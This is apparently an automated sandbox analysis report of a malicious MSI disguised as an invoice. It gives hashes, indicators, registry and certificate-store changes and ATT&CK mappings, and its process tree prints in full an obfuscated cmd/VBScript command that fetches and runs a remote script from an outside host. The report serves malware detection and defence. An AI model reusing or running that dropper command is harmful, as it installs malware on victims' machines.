17771bd38e0bf7cf7f0118e70ccfe3fedbf1c8a4a5b426aacd62a8bbb31fa68c

Analysis

max time kernel
359s
max time network
360s
platform
windows7_x64
resource
win7-20240220-es
resource tags

arch:x64arch:x86image:win7-20240220-eslocale:es-esos:windows7-x64systemwindows
submitted
06/03/2024, 19:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S-FACTURA2030𝕗𝟘𝟡20049059039057⃣6⃣7⃣07jlJ.msi
Size

408KB
MD5

74713b38f7fc6dad893684948b941e65
SHA1

3090154f42e728f7c1de36f1e7c9e78075a3d999
SHA256

17771bd38e0bf7cf7f0118e70ccfe3fedbf1c8a4a5b426aacd62a8bbb31fa68c
SHA512

f2d7b544afc6e4b1f731cefca7472fcc39fc39d259aee5cb1d8bec2f441729c3366780c5304de5e0d42e4b74566f0e42c04ea40db192e09aee50dd31a76d28a6
SSDEEP

6144:d7XaD+m4jXhtzPEBxB0Z1h1a93j3GruNmdDxjOCdx:dLPm4jxtzPEfBAMyruNm7dx

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	992	WScript.exe
7	992	WScript.exe
9	992	WScript.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\volsnap.inf_amd64_neutral_7499a4fac85b39fc\volsnap.PNF	DrvInst.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\INF\volsnap.PNF	DrvInst.exe
File created	C:\Windows\Installer\f763295.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f763295.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI32E3.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe

Loads dropped DLL 1 IoCs

pid	Process
2792	MsiExec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\63C768CF\LanguageList = 650073002d0045005300000065007300000065006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	WScript.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3052	msiexec.exe
3052	msiexec.exe
3052	msiexec.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2812	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2812	msiexec.exe
Token: SeRestorePrivilege	3052	msiexec.exe
Token: SeTakeOwnershipPrivilege	3052	msiexec.exe
Token: SeSecurityPrivilege	3052	msiexec.exe
Token: SeCreateTokenPrivilege	2812	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2812	msiexec.exe
Token: SeLockMemoryPrivilege	2812	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2812	msiexec.exe
Token: SeMachineAccountPrivilege	2812	msiexec.exe
Token: SeTcbPrivilege	2812	msiexec.exe
Token: SeSecurityPrivilege	2812	msiexec.exe
Token: SeTakeOwnershipPrivilege	2812	msiexec.exe
Token: SeLoadDriverPrivilege	2812	msiexec.exe
Token: SeSystemProfilePrivilege	2812	msiexec.exe
Token: SeSystemtimePrivilege	2812	msiexec.exe
Token: SeProfSingleProcessPrivilege	2812	msiexec.exe
Token: SeIncBasePriorityPrivilege	2812	msiexec.exe
Token: SeCreatePagefilePrivilege	2812	msiexec.exe
Token: SeCreatePermanentPrivilege	2812	msiexec.exe
Token: SeBackupPrivilege	2812	msiexec.exe
Token: SeRestorePrivilege	2812	msiexec.exe
Token: SeShutdownPrivilege	2812	msiexec.exe
Token: SeDebugPrivilege	2812	msiexec.exe
Token: SeAuditPrivilege	2812	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2812	msiexec.exe
Token: SeChangeNotifyPrivilege	2812	msiexec.exe
Token: SeRemoteShutdownPrivilege	2812	msiexec.exe
Token: SeUndockPrivilege	2812	msiexec.exe
Token: SeSyncAgentPrivilege	2812	msiexec.exe
Token: SeEnableDelegationPrivilege	2812	msiexec.exe
Token: SeManageVolumePrivilege	2812	msiexec.exe
Token: SeImpersonatePrivilege	2812	msiexec.exe
Token: SeCreateGlobalPrivilege	2812	msiexec.exe
Token: SeBackupPrivilege	2668	vssvc.exe
Token: SeRestorePrivilege	2668	vssvc.exe
Token: SeAuditPrivilege	2668	vssvc.exe
Token: SeBackupPrivilege	3052	msiexec.exe
Token: SeRestorePrivilege	3052	msiexec.exe
Token: SeRestorePrivilege	2428	DrvInst.exe
Token: SeRestorePrivilege	2428	DrvInst.exe
Token: SeRestorePrivilege	2428	DrvInst.exe
Token: SeRestorePrivilege	2428	DrvInst.exe
Token: SeRestorePrivilege	2428	DrvInst.exe
Token: SeRestorePrivilege	2428	DrvInst.exe
Token: SeRestorePrivilege	2428	DrvInst.exe
Token: SeLoadDriverPrivilege	2428	DrvInst.exe
Token: SeLoadDriverPrivilege	2428	DrvInst.exe
Token: SeLoadDriverPrivilege	2428	DrvInst.exe
Token: SeRestorePrivilege	3052	msiexec.exe
Token: SeTakeOwnershipPrivilege	3052	msiexec.exe
Token: SeRestorePrivilege	3052	msiexec.exe
Token: SeTakeOwnershipPrivilege	3052	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2812	msiexec.exe
2812	msiexec.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2792	3052	msiexec.exe	32
PID 3052 wrote to memory of 2792	3052	msiexec.exe	32
PID 3052 wrote to memory of 2792	3052	msiexec.exe	32
PID 3052 wrote to memory of 2792	3052	msiexec.exe	32
PID 3052 wrote to memory of 2792	3052	msiexec.exe	32
PID 3052 wrote to memory of 2792	3052	msiexec.exe	32
PID 3052 wrote to memory of 2792	3052	msiexec.exe	32
PID 2792 wrote to memory of 2808	2792	MsiExec.exe	33
PID 2792 wrote to memory of 2808	2792	MsiExec.exe	33
PID 2792 wrote to memory of 2808	2792	MsiExec.exe	33
PID 2792 wrote to memory of 2808	2792	MsiExec.exe	33
PID 2808 wrote to memory of 1596	2808	cmD.exe	35
PID 2808 wrote to memory of 1596	2808	cmD.exe	35
PID 2808 wrote to memory of 1596	2808	cmD.exe	35
PID 2808 wrote to memory of 1596	2808	cmD.exe	35
PID 1596 wrote to memory of 992	1596	cmd.exe	36
PID 1596 wrote to memory of 992	1596	cmd.exe	36
PID 1596 wrote to memory of 992	1596	cmd.exe	36
PID 1596 wrote to memory of 992	1596	cmd.exe	36

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\S-FACTURA2030𝕗𝟘𝟡20049059039057⃣6⃣7⃣07jlJ.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2812

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 860EC431B72EC91886FC430F12F0C705
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\syswow64\cmD.exe
    cmD /V/D/c EcHo f5302=".":FunctIon m3y6n7(s2lp3):ijd4x7=Array(":","t","r","c","1"):m3y6n7=ijd4x7(s2lp3):end function:be16="S"+m3y6n7(3)+"rip"+m3y6n7(1)+m3y6n7(0)+"hT"+m3y6n7(1)+"ps://contdk"+f5302+"bounceme"+f5302+"net/g1":eval("Ge"+m3y6n7(1)+"Obje"+m3y6n7(3)+m3y6n7(1)+"(be16)")>nul>C:\Users\Public\^q8s12.vbs&c:\windows\system32\cmd /c start C:\Users\Public\q8s12.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - \??\c:\windows\SysWOW64\cmd.exe
      c:\windows\system32\cmd /c start C:\Users\Public\q8s12.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1596
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\q8s12.vbs"
        5⤵
        Blocklisted process makes network request
        Modifies system certificate store
        
        PID:992

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D4" "00000000000005A4"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\q8s12.vbs

Filesize
265B

MD5
9b77e4645c879280fc3e5e4cd02e211b

SHA1
22c1a2c21cefaef3aa4f4a85a8fb3db7bc9a2ab0

SHA256
8ea673f42e32594751d8fb57299f114e45c68896d09675ff421777e599c87f13

SHA512
594cc8bdc9c43bc3873804722803e37c3a47930ea39e2033ee4cd364f9ad6ca84b00f228a6494ba5d222afc176f32800ba92e3eb32f362b41848061114c0b45b

Download Submit
C:\Windows\Installer\MSI32E3.tmp

Filesize
377KB

MD5
3d72c225720dd7a2c627b6728cc8a488

SHA1
01c5fa512e04579bc5ac3c8a950c60406eed7f97

SHA256
616b4e543e8eb5ee4443cc230dd16dc46b931e25e3a8ce8992eccd3b94858ac5

SHA512
6c2ecb89deb2ea9dd6da5f191714a5694dda7349e7c3098f48eca2b06ab37949d7bf175d44f476dc2f34999eb7bdf1d565e098ddeb7d4115b79bff8a50a959e8

Download Submit
C:\Windows\System32\DriverStore\FileRepository\volsnap.inf_amd64_neutral_7499a4fac85b39fc\volsnap.PNF

Filesize
5KB

MD5
5e961b1e105c3b3e61e882a553bf5355

SHA1
a5410576b80da1982c64fd9bb81b85f6bc7cd12d

SHA256
1b68210cf77bbf95273c182120e0e38bc6750b361a5c2725319afb753dcfc0d1

SHA512
943d43bb77968c9d1df98076ec4a344c01596b2ae7771ce37dd10389ff96eadca91412106f404da5b54fb345d6e0e845259c8cec4537ff4d23c46a5a4e8d756a

Download Submit